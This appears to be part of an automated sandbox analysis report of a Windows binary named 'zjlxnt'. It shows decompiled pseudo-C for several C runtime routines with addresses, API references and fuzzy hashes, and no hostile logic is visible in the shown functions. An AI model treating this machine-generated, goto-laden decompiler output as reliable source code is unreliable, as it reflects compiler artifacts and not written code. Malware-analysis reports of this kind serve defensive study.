                                                          				void* _v56;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t49;
                                                          				int _t54;
                                                          				signed int _t59;
                                                          				signed int _t60;
                                                          				void* _t63;
                                                          				signed int _t64;
                                                          				signed int _t65;
                                                          				int _t71;
                                                          				char* _t76;
                                                          				char* _t77;
                                                          				int _t81;
                                                          				int _t82;
                                                          				intOrPtr _t94;
                                                          				intOrPtr _t95;
                                                          				signed int _t103;
                                                          				void* _t104;
                                                          				int _t106;
                                                          				void* _t107;
                                                          				intOrPtr* _t108;
                                                          
                                                          				_t49 =  *0x418014; // 0xb25f2588
                                                          				_v8 = _t49 ^ _t103;
                                                          				_t83 = _a24;
                                                          				_v40 = _a4;
                                                          				_t102 = _a20;
                                                          				_v44 = _a8;
                                                          				_t53 = _a16;
                                                          				_v32 = _a16;
                                                          				_v36 = _a24;
                                                          				if(_t102 <= 0) {
                                                          					if(_t102 < 0xffffffff) {
                                                          						goto L54;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          				} else {
                                                          					_t81 = E0040E7A2(_t53, _t102);
                                                          					_t83 = _v36;
                                                          					_t102 = _t81;
                                                          					L3:
                                                          					_t101 = _a28;
                                                          					if(_t101 <= 0) {
                                                          						if(_t101 < 0xffffffff) {
                                                          							goto L54;
                                                          						} else {
                                                          							goto L6;
                                                          						}
                                                          					} else {
                                                          						_t101 = E0040E7A2(_t83, _t101);
                                                          						_a28 = _t101;
                                                          						L6:
                                                          						_t82 = _a32;
                                                          						if(_t82 == 0) {
                                                          							_t82 =  *( *_v40 + 8);
                                                          							_a32 = _t82;
                                                          						}
                                                          						if(_t102 == 0 || _t101 == 0) {
                                                          							if(_t102 == _t101) {
                                                          								L61:
                                                          								_push(2);
                                                          								goto L23;
                                                          							} else {
                                                          								if(_t101 > 1) {
                                                          									L32:
                                                          									_t54 = 1;
                                                          								} else {
                                                          									if(_t102 > 1) {
                                                          										L22:
                                                          										_push(3);
                                                          										goto L23;
                                                          									} else {
                                                          										if(GetCPInfo(_t82,  &_v28) == 0) {
                                                          											goto L54;
                                                          										} else {
                                                          											if(_t102 <= 0) {
                                                          												if(_t101 <= 0) {
                                                          													goto L33;
                                                          												} else {
                                                          													if(_v28 >= 2) {
                                                          														_t76 =  &_v22;
                                                          														if(_v22 != 0) {
                                                          															_t101 = _v36;
                                                          															while(1) {
                                                          																_t94 =  *((intOrPtr*)(_t76 + 1));
                                                          																if(_t94 == 0) {
                                                          																	goto L32;
                                                          																}
                                                          																_t100 =  *_t101;
                                                          																if(_t100 <  *_t76 || _t100 > _t94) {
                                                          																	_t76 = _t76 + 2;
                                                          																	if( *_t76 != 0) {
                                                          																		continue;
                                                          																	} else {
                                                          																		goto L32;
                                                          																	}
                                                          																} else {
                                                          																	goto L61;
                                                          																}
                                                          																goto L55;
                                                          															}
                                                          														}
                                                          													}
                                                          													goto L32;
                                                          												}
                                                          											} else {
                                                          												if(_v28 >= 2) {
                                                          													_t77 =  &_v22;
                                                          													if(_v22 != 0) {
                                                          														_t102 = _v32;
                                                          														while(1) {
                                                          															_t95 =  *((intOrPtr*)(_t77 + 1));
                                                          															if(_t95 == 0) {
                                                          																goto L22;
                                                          															}
                                                          															_t100 =  *_t102;
                                                          															if(_t100 <  *_t77 || _t100 > _t95) {
                                                          																_t77 = _t77 + 2;
                                                          																if( *_t77 != 0) {
                                                          																	continue;
                                                          																} else {
                                                          																	goto L22;
                                                          																}
                                                          															} else {
                                                          																goto L61;
                                                          															}
                                                          															goto L23;
                                                          														}
                                                          													}
                                                          												}
                                                          												goto L22;
                                                          												L23:
                                                          												_pop(_t54);
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							L33:
                                                          							_t59 = E00409976(_t82, 9, _v32, _t102, 0, 0);
                                                          							_t106 = _t104 + 0x18;
                                                          							_v40 = _t59;
                                                          							if(_t59 == 0) {
                                                          								L54:
                                                          								_t54 = 0;
                                                          							} else {
                                                          								_t100 = _t59 + _t59 + 8;
                                                          								asm("sbb eax, eax");
                                                          								_t60 = _t59 & _t59 + _t59 + 0x00000008;
                                                          								if(_t60 == 0) {
                                                          									L60:
                                                          									_push(0);
                                                          									goto L59;
                                                          								} else {
                                                          									if(_t60 > 0x400) {
                                                          										_t82 = E0040A6A3(_t60);
                                                          										if(_t82 == 0) {
                                                          											goto L60;
                                                          										} else {
                                                          											 *_t82 = 0xdddd;
                                                          											goto L40;
                                                          										}
                                                          									} else {
                                                          										E00410C20(_t60);
                                                          										_t82 = _t106;
                                                          										if(_t82 == 0) {
                                                          											goto L60;
                                                          										} else {
                                                          											 *_t82 = 0xcccc;
                                                          											L40:
                                                          											_t82 = _t82 + 8;
                                                          											if(_t82 == 0) {
                                                          												goto L60;
                                                          											} else {
                                                          												_t102 = _a32;
                                                          												_t63 = E00409976(_a32, 1, _v32, _a32, _t82, _v40);
                                                          												_t107 = _t106 + 0x18;
                                                          												if(_t63 == 0) {
                                                          													L58:
                                                          													_push(_t82);
                                                          													L59:
                                                          													E0040A7F2();
                                                          													goto L53;
                                                          												} else {
                                                          													_t101 = _v36;
                                                          													_t64 = E00409976(_t102, 9, _v36, _v36, 0, 0);
                                                          													_t108 = _t107 + 0x18;
                                                          													_v32 = _t64;
                                                          													if(_t64 == 0) {
                                                          														goto L58;
                                                          													} else {
                                                          														_t100 = _t64 + _t64 + 8;
                                                          														asm("sbb eax, eax");
                                                          														_t65 = _t64 & _t64 + _t64 + 0x00000008;
                                                          														if(_t65 == 0) {
                                                          															L57:
                                                          															_push(0);
                                                          															goto L52;
                                                          														} else {
                                                          															if(_t65 > 0x400) {
                                                          																_t101 = E0040A6A3(_t65);
                                                          																if(_t101 == 0) {
                                                          																	goto L57;
                                                          																} else {
                                                          																	 *_t101 = 0xdddd;
                                                          																	goto L49;
                                                          																}
                                                          															} else {
                                                          																E00410C20(_t65);
                                                          																_t101 = _t108;
                                                          																if(_t101 == 0) {
                                                          																	goto L57;
                                                          																} else {
                                                          																	 *_t101 = 0xcccc;
                                                          																	L49:
                                                          																	_t101 = _t101 + 8;
                                                          																	if(_t101 == 0) {
                                                          																		goto L57;
                                                          																	} else {
                                                          																		if(E00409976(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
                                                          																			_t71 = E0040ADC3(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
                                                          																			_t102 = _t71;
                                                          																			E0040A7F2(_t101);
                                                          																			E0040A7F2(_t82);
                                                          																			_t54 = _t71;
                                                          																		} else {
                                                          																			_push(_t101);
                                                          																			L52:
                                                          																			E0040A7F2();
                                                          																			E0040A7F2(_t82);
                                                          																			L53:
                                                          																			goto L54;
                                                          																		}
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L55:
                                                          				return E00401BE5(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
                                                          			}

































                                                          0x0040e7c6
                                                          0x0040e7cd
                                                          0x0040e7d3
                                                          0x0040e7d7
                                                          0x0040e7de
                                                          0x0040e7e1
                                                          0x0040e7e4
                                                          0x0040e7e7
                                                          0x0040e7ea
                                                          0x0040e7f0
                                                          0x0040e805
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040e7f2
                                                          0x0040e7f4
                                                          0x0040e7fb
                                                          0x0040e7fe
                                                          0x0040e80b
                                                          0x0040e80b
                                                          0x0040e810
                                                          0x0040e825
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040e812
                                                          0x0040e81a
                                                          0x0040e81d
                                                          0x0040e82b
                                                          0x0040e82b
                                                          0x0040e830
                                                          0x0040e837
                                                          0x0040e83a
                                                          0x0040e83a
                                                          0x0040e83f
                                                          0x0040e84b
                                                          0x0040ea56
                                                          0x0040ea56
                                                          0x00000000
                                                          0x0040e851
                                                          0x0040e854
                                                          0x0040e8e0
                                                          0x0040e8e2
                                                          0x0040e85a
                                                          0x0040e85d
                                                          0x0040e8a5
                                                          0x0040e8a5
                                                          0x00000000
                                                          0x0040e85f
                                                          0x0040e86c
                                                          0x00000000
                                                          0x0040e872
                                                          0x0040e874
                                                          0x0040e8af
                                                          0x00000000
                                                          0x0040e8b1
                                                          0x0040e8b5
                                                          0x0040e8bb
                                                          0x0040e8be
                                                          0x0040e8c0
                                                          0x0040e8c3
                                                          0x0040e8c3
                                                          0x0040e8c8
                                                          0x00000000
                                                          0x00000000
                                                          0x0040e8ca
                                                          0x0040e8ce
                                                          0x0040e8d8
                                                          0x0040e8de
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040e8ce
                                                          0x0040e8c3
                                                          0x0040e8be
                                                          0x00000000
                                                          0x0040e8b5
                                                          0x0040e876
                                                          0x0040e87a
                                                          0x0040e880
                                                          0x0040e883
                                                          0x0040e885
                                                          0x0040e888
                                                          0x0040e888
                                                          0x0040e88d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040e88f
                                                          0x0040e893
                                                          0x0040e89d
                                                          0x0040e8a3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040e893
                                                          0x0040e888
                                                          0x0040e883
                                                          0x00000000
                                                          0x0040e8a7
                                                          0x0040e8a7
                                                          0x0040e8a7
                                                          0x0040e874
                                                          0x0040e86c
                                                          0x0040e85d
                                                          0x0040e854
                                                          0x0040e8e8
                                                          0x0040e8e8
                                                          0x0040e8f3
                                                          0x0040e8f8
                                                          0x0040e8fb
                                                          0x0040e900
                                                          0x0040ea06
                                                          0x0040ea06
                                                          0x0040e906
                                                          0x0040e909
                                                          0x0040e90e
                                                          0x0040e910
                                                          0x0040e912
                                                          0x0040ea52
                                                          0x0040ea52
                                                          0x00000000
                                                          0x0040e918
                                                          0x0040e91d
                                                          0x0040e93c
                                                          0x0040e941
                                                          0x00000000
                                                          0x0040e947
                                                          0x0040e947
                                                          0x00000000
                                                          0x0040e947
                                                          0x0040e91f
                                                          0x0040e91f
                                                          0x0040e924
                                                          0x0040e928
                                                          0x00000000
                                                          0x0040e92e
                                                          0x0040e92e
                                                          0x0040e94d
                                                          0x0040e94d
                                                          0x0040e952
                                                          0x00000000
                                                          0x0040e958
                                                          0x0040e960
                                                          0x0040e966
                                                          0x0040e96b
                                                          0x0040e970
                                                          0x0040ea4a
                                                          0x0040ea4a
                                                          0x0040ea4b
                                                          0x0040ea4b
                                                          0x00000000
                                                          0x0040e976
                                                          0x0040e97b
                                                          0x0040e982
                                                          0x0040e987
                                                          0x0040e98a
                                                          0x0040e98f
                                                          0x00000000
                                                          0x0040e995
                                                          0x0040e998
                                                          0x0040e99d
                                                          0x0040e99f
                                                          0x0040e9a1
                                                          0x0040ea46
                                                          0x0040ea46
                                                          0x00000000
                                                          0x0040e9a7
                                                          0x0040e9ac
                                                          0x0040e9cb
                                                          0x0040e9d0
                                                          0x00000000
                                                          0x0040e9d2
                                                          0x0040e9d2
                                                          0x00000000
                                                          0x0040e9d2
                                                          0x0040e9ae
                                                          0x0040e9ae
                                                          0x0040e9b3
                                                          0x0040e9b7
                                                          0x00000000
                                                          0x0040e9bd
                                                          0x0040e9bd
                                                          0x0040e9d8
                                                          0x0040e9d8
                                                          0x0040e9dd
                                                          0x00000000
                                                          0x0040e9df
                                                          0x0040e9f6
                                                          0x0040ea2d
                                                          0x0040ea33
                                                          0x0040ea35
                                                          0x0040ea3b
                                                          0x0040ea42
                                                          0x0040e9f8
                                                          0x0040e9f8
                                                          0x0040e9f9
                                                          0x0040e9f9
                                                          0x0040e9ff
                                                          0x0040ea05
                                                          0x00000000
                                                          0x0040ea05
                                                          0x0040e9f6
                                                          0x0040e9dd
                                                          0x0040e9b7
                                                          0x0040e9ac
                                                          0x0040e9a1
                                                          0x0040e98f
                                                          0x0040e970
                                                          0x0040e952
                                                          0x0040e928
                                                          0x0040e91d
                                                          0x0040e912
                                                          0x0040e900
                                                          0x0040e83f
                                                          0x0040e810
                                                          0x0040ea08
                                                          0x0040ea19

                                                          APIs
                                                          • GetCPInfo.KERNEL32(005A3308,005A3308,?,7FFFFFFF,?,0040EA8E,005A3308,005A3308,?,005A3308,?,?,?,?,005A3308,?), ref: 0040E864
                                                          • __alloca_probe_16.LIBCMT ref: 0040E91F
                                                          • __alloca_probe_16.LIBCMT ref: 0040E9AE
                                                          • __freea.LIBCMT ref: 0040E9F9
                                                          • __freea.LIBCMT ref: 0040E9FF
                                                          • __freea.LIBCMT ref: 0040EA35
                                                          • __freea.LIBCMT ref: 0040EA3B
                                                          • __freea.LIBCMT ref: 0040EA4B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16$Info
                                                          • String ID:
                                                          • API String ID: 127012223-0
                                                          • Opcode ID: 2b2db7e58a28717a63a616f0e69bd89b9126ce27af168e9003e6bc30fd40b907
                                                          • Instruction ID: f8f137e2a3d05797d4300cc06c2158c3c7d074ffb0f9cd52750916c6997d02f4
                                                          • Opcode Fuzzy Hash: 2b2db7e58a28717a63a616f0e69bd89b9126ce27af168e9003e6bc30fd40b907
                                                          • Instruction Fuzzy Hash: 0071E973A002055BDF20AB568C41BAF77B5AF89314F19487BE904B73C2D63DDC609BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00401D60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				char _v5;
                                                          				signed int _v12;
                                                          				char _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				char _v32;
                                                          				char _t52;
                                                          				signed int _t59;
                                                          				intOrPtr _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t62;
                                                          				intOrPtr _t64;
                                                          				intOrPtr _t66;
                                                          				intOrPtr _t67;
                                                          				intOrPtr _t72;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr _t77;
                                                          				signed int _t81;
                                                          				char _t83;
                                                          				intOrPtr _t86;
                                                          				intOrPtr _t93;
                                                          				intOrPtr _t96;
                                                          				intOrPtr* _t98;
                                                          				void* _t102;
                                                          				void* _t104;
                                                          				void* _t111;
                                                          
                                                          				_t89 = __edx;
                                                          				_t76 = _a4;
                                                          				_push(__edi);
                                                          				_v5 = 0;
                                                          				_v16 = 1;
                                                          				 *_t76 = E00410D90(__ecx,  *_t76);
                                                          				_t77 = _a8;
                                                          				_t6 = _t77 + 0x10; // 0x11
                                                          				_t96 = _t6;
                                                          				_push(_t96);
                                                          				_v20 = _t96;
                                                          				_v12 =  *(_t77 + 8) ^  *0x418014;
                                                          				E00401D20(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x418014);
                                                          				E004023B7(_a12);
                                                          				_t52 = _a4;
                                                          				_t104 = _t102 - 0x1c + 0x10;
                                                          				_t93 =  *((intOrPtr*)(_t77 + 0xc));
                                                          				if(( *(_t52 + 4) & 0x00000066) != 0) {
                                                          					__eflags = _t93 - 0xfffffffe;
                                                          					if(_t93 != 0xfffffffe) {
                                                          						_t89 = 0xfffffffe;
                                                          						E004023A0(_t77, 0xfffffffe, _t96, 0x418014);
                                                          						goto L13;
                                                          					}
                                                          					goto L14;
                                                          				} else {
                                                          					_v32 = _t52;
                                                          					_v28 = _a12;
                                                          					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
                                                          					if(_t93 == 0xfffffffe) {
                                                          						L14:
                                                          						return _v16;
                                                          					} else {
                                                          						do {
                                                          							_t81 = _v12;
                                                          							_t59 = _t93 + (_t93 + 2) * 2;
                                                          							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
                                                          							_t60 = _t81 + _t59 * 4;
                                                          							_t82 =  *((intOrPtr*)(_t60 + 4));
                                                          							_v24 = _t60;
                                                          							if( *((intOrPtr*)(_t60 + 4)) == 0) {
                                                          								_t83 = _v5;
                                                          								goto L7;
                                                          							} else {
                                                          								_t89 = _t96;
                                                          								_t61 = E00402340(_t82, _t96);
                                                          								_t83 = 1;
                                                          								_v5 = 1;
                                                          								_t111 = _t61;
                                                          								if(_t111 < 0) {
                                                          									_v16 = 0;
                                                          									L13:
                                                          									_push(_t96);
                                                          									E00401D20(_t77, _t89, _t93, _t96, _v12);
                                                          									goto L14;
                                                          								} else {
                                                          									if(_t111 > 0) {
                                                          										_t62 = _a4;
                                                          										__eflags =  *_t62 - 0xe06d7363;
                                                          										if( *_t62 == 0xe06d7363) {
                                                          											__eflags =  *0x411248;
                                                          											if(__eflags != 0) {
                                                          												_t72 = E00410990(__eflags, 0x411248);
                                                          												_t104 = _t104 + 4;
                                                          												__eflags = _t72;
                                                          												if(_t72 != 0) {
                                                          													_t98 =  *0x411248; // 0x401f30
                                                          													 *0x4111f0(_a4, 1);
                                                          													 *_t98();
                                                          													_t96 = _v20;
                                                          													_t104 = _t104 + 8;
                                                          												}
                                                          												_t62 = _a4;
                                                          											}
                                                          										}
                                                          										_t90 = _t62;
                                                          										E00402380(_t62, _a8, _t62);
                                                          										_t64 = _a8;
                                                          										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
                                                          										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
                                                          											_t90 = _t93;
                                                          											E004023A0(_t64, _t93, _t96, 0x418014);
                                                          											_t64 = _a8;
                                                          										}
                                                          										_push(_t96);
                                                          										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
                                                          										E00401D20(_t77, _t90, _t93, _t96, _v12);
                                                          										_t86 =  *((intOrPtr*)(_v24 + 8));
                                                          										E00402360();
                                                          										asm("int3");
                                                          										_t66 = E004024F1();
                                                          										__eflags = _t66;
                                                          										if(_t66 != 0) {
                                                          											_t67 = E004024A3(_t86);
                                                          											__eflags = _t67;
                                                          											if(_t67 != 0) {
                                                          												return 1;
                                                          											} else {
                                                          												E0040252D();
                                                          												goto L24;
                                                          											}
                                                          										} else {
                                                          											L24:
                                                          											__eflags = 0;
                                                          											return 0;
                                                          										}
                                                          									} else {
                                                          										goto L7;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L28;
                                                          							L7:
                                                          							_t93 = _t77;
                                                          						} while (_t77 != 0xfffffffe);
                                                          						if(_t83 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				L28:
                                                          			}






























                                                          0x00401d60
                                                          0x00401d67
                                                          0x00401d6b
                                                          0x00401d6c
                                                          0x00401d72
                                                          0x00401d7e
                                                          0x00401d80
                                                          0x00401d86
                                                          0x00401d86
                                                          0x00401d8f
                                                          0x00401d91
                                                          0x00401d94
                                                          0x00401d97
                                                          0x00401d9f
                                                          0x00401da4
                                                          0x00401da7
                                                          0x00401daa
                                                          0x00401db1
                                                          0x00401e0d
                                                          0x00401e10
                                                          0x00401e18
                                                          0x00401e1f
                                                          0x00000000
                                                          0x00401e1f
                                                          0x00000000
                                                          0x00401db3
                                                          0x00401db3
                                                          0x00401db9
                                                          0x00401dbf
                                                          0x00401dc5
                                                          0x00401e30
                                                          0x00401e39
                                                          0x00401dc7
                                                          0x00401dc7
                                                          0x00401dc7
                                                          0x00401dcd
                                                          0x00401dd0
                                                          0x00401dd3
                                                          0x00401dd6
                                                          0x00401dd9
                                                          0x00401dde
                                                          0x00401df4
                                                          0x00000000
                                                          0x00401de0
                                                          0x00401de0
                                                          0x00401de2
                                                          0x00401de7
                                                          0x00401de9
                                                          0x00401dec
                                                          0x00401dee
                                                          0x00401e04
                                                          0x00401e24
                                                          0x00401e24
                                                          0x00401e28
                                                          0x00000000
                                                          0x00401df0
                                                          0x00401df0
                                                          0x00401e3a
                                                          0x00401e3d
                                                          0x00401e43
                                                          0x00401e45
                                                          0x00401e4c
                                                          0x00401e53
                                                          0x00401e58
                                                          0x00401e5b
                                                          0x00401e5d
                                                          0x00401e5f
                                                          0x00401e6c
                                                          0x00401e72
                                                          0x00401e74
                                                          0x00401e77
                                                          0x00401e77
                                                          0x00401e7a
                                                          0x00401e7a
                                                          0x00401e4c
                                                          0x00401e80
                                                          0x00401e82
                                                          0x00401e87
                                                          0x00401e8a
                                                          0x00401e8d
                                                          0x00401e95
                                                          0x00401e99
                                                          0x00401e9e
                                                          0x00401e9e
                                                          0x00401ea1
                                                          0x00401ea5
                                                          0x00401ea8
                                                          0x00401eb5
                                                          0x00401eb8
                                                          0x00401ebd
                                                          0x00401ebe
                                                          0x00401ec3
                                                          0x00401ec5
                                                          0x00401eca
                                                          0x00401ecf
                                                          0x00401ed1
                                                          0x00401edc
                                                          0x00401ed3
                                                          0x00401ed3
                                                          0x00000000
                                                          0x00401ed3
                                                          0x00401ec7
                                                          0x00401ec7
                                                          0x00401ec7
                                                          0x00401ec9
                                                          0x00401ec9
                                                          0x00401df2
                                                          0x00000000
                                                          0x00401df2
                                                          0x00401df0
                                                          0x00401dee
                                                          0x00000000
                                                          0x00401df7
                                                          0x00401df7
                                                          0x00401df9
                                                          0x00401e00
                                                          0x00000000
                                                          0x00401e02
                                                          0x00000000
                                                          0x00401e00
                                                          0x00401dc5
                                                          0x00000000

                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00401D97
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00401D9F
                                                          • _ValidateLocalCookies.LIBCMT ref: 00401E28
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00401E53
                                                          • _ValidateLocalCookies.LIBCMT ref: 00401EA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 5853fecd5551d68b8231a05582defb087287b744298f9fe8d297d29845485331
                                                          • Instruction ID: 6ef646e612ac45c7e77e97ed302a33c9d1442d7dd7cb3af8627288e3f0e9caaf
                                                          • Opcode Fuzzy Hash: 5853fecd5551d68b8231a05582defb087287b744298f9fe8d297d29845485331
                                                          • Instruction Fuzzy Hash: BF41B630A002089BCF10DF69C884A9EBBB5BF45318F14817AED14BB3E2D779A945CBD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040AC14(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                          				signed int _v8;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				WCHAR* _t26;
                                                          				signed int _t29;
                                                          				void** _t30;
                                                          				signed int* _t35;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          
                                                          				_t35 = _a4;
                                                          				while(_t35 != _a8) {
                                                          					_t29 =  *_t35;
                                                          					_v8 = _t29;
                                                          					_t38 =  *(0x419230 + _t29 * 4);
                                                          					if(_t38 == 0) {
                                                          						_t26 =  *(0x412b30 + _t29 * 4);
                                                          						_t38 = LoadLibraryExW(_t26, 0, 0x800);
                                                          						if(_t38 != 0) {
                                                          							L14:
                                                          							_t30 = 0x419230 + _v8 * 4;
                                                          							 *_t30 = _t38;
                                                          							if( *_t30 != 0) {
                                                          								FreeLibrary(_t38);
                                                          							}
                                                          							L16:
                                                          							_t20 = _t38;
                                                          							L13:
                                                          							return _t20;
                                                          						}
                                                          						_t22 = GetLastError();
                                                          						if(_t22 != 0x57) {
                                                          							L9:
                                                          							 *(0x419230 + _v8 * 4) = _t22 | 0xffffffff;
                                                          							L10:
                                                          							_t35 =  &(_t35[1]);
                                                          							continue;
                                                          						}
                                                          						_t22 = E00406308(_t26, L"api-ms-", 7);
                                                          						_t40 = _t40 + 0xc;
                                                          						if(_t22 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_t22 = E00406308(_t26, L"ext-ms-", 7);
                                                          						_t40 = _t40 + 0xc;
                                                          						if(_t22 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_t22 = LoadLibraryExW(_t26, _t38, _t38);
                                                          						_t38 = _t22;
                                                          						if(_t38 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					if(_t38 != 0xffffffff) {
                                                          						goto L16;
                                                          					}
                                                          					goto L10;
                                                          				}
                                                          				_t20 = 0;
                                                          				goto L13;
                                                          			}












                                                          0x0040ac1d
                                                          0x0040acb2
                                                          0x0040ac25
                                                          0x0040ac27
                                                          0x0040ac31
                                                          0x0040ac36
                                                          0x0040ac43
                                                          0x0040ac58
                                                          0x0040ac5c
                                                          0x0040acc2
                                                          0x0040acc7
                                                          0x0040acce
                                                          0x0040acd2
                                                          0x0040acd5
                                                          0x0040acd5
                                                          0x0040acdb
                                                          0x0040acdb
                                                          0x0040acbd
                                                          0x0040acc1
                                                          0x0040acc1
                                                          0x0040ac5e
                                                          0x0040ac67
                                                          0x0040aca0
                                                          0x0040acad
                                                          0x0040acaf
                                                          0x0040acaf
                                                          0x00000000
                                                          0x0040acaf
                                                          0x0040ac71
                                                          0x0040ac76
                                                          0x0040ac7b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040ac85
                                                          0x0040ac8a
                                                          0x0040ac8f
                                                          0x00000000
                                                          0x00000000
                                                          0x0040ac94
                                                          0x0040ac9a
                                                          0x0040ac9e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040ac9e
                                                          0x0040ac3b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040ac41
                                                          0x0040acbb
                                                          0x00000000

                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,B25F2588,?,0040AD23,?,00000040,00000000,?), ref: 0040ACD5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3664257935-537541572
                                                          • Opcode ID: 1e41e8e084f44416e7fc46dfab0bc2685af7dd9261567f4ce6f1825b991d48dc
                                                          • Instruction ID: 611442bef351d9fd720cb4668506806d26cc55d3d9c032183dd6a6f5382d3974
                                                          • Opcode Fuzzy Hash: 1e41e8e084f44416e7fc46dfab0bc2685af7dd9261567f4ce6f1825b991d48dc
                                                          • Instruction Fuzzy Hash: D021D831A04310ABEB219B21DD40AAB37689B45764F260536E906B73D0D73CED11C6EE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E00402411(void* __ecx) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				void* _t13;
                                                          				void* _t14;
                                                          				void* _t18;
                                                          				void* _t23;
                                                          				long _t24;
                                                          				void* _t27;
                                                          
                                                          				_t13 = __ecx;
                                                          				if( *0x418020 != 0xffffffff) {
                                                          					_t24 = GetLastError();
                                                          					_t11 = E004026F4(_t13,  *0x418020);
                                                          					_t14 = _t23;
                                                          					if(_t11 == 0xffffffff) {
                                                          						L5:
                                                          						_t11 = 0;
                                                          					} else {
                                                          						if(_t11 == 0) {
                                                          							if(E0040272F(_t14,  *0x418020, 0xffffffff) != 0) {
                                                          								_push(0x28);
                                                          								_t27 = E00406282();
                                                          								_t18 = 1;
                                                          								if(_t27 == 0) {
                                                          									L8:
                                                          									_t11 = 0;
                                                          									E0040272F(_t18,  *0x418020, 0);
                                                          								} else {
                                                          									_t8 = E0040272F(_t18,  *0x418020, _t27);
                                                          									_pop(_t18);
                                                          									if(_t8 != 0) {
                                                          										_t11 = _t27;
                                                          										_t27 = 0;
                                                          									} else {
                                                          										goto L8;
                                                          									}
                                                          								}
                                                          								E004061BE(_t27);
                                                          							} else {
                                                          								goto L5;
                                                          							}
                                                          						}
                                                          					}
                                                          					SetLastError(_t24);
                                                          					return _t11;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}











                                                          0x00402411
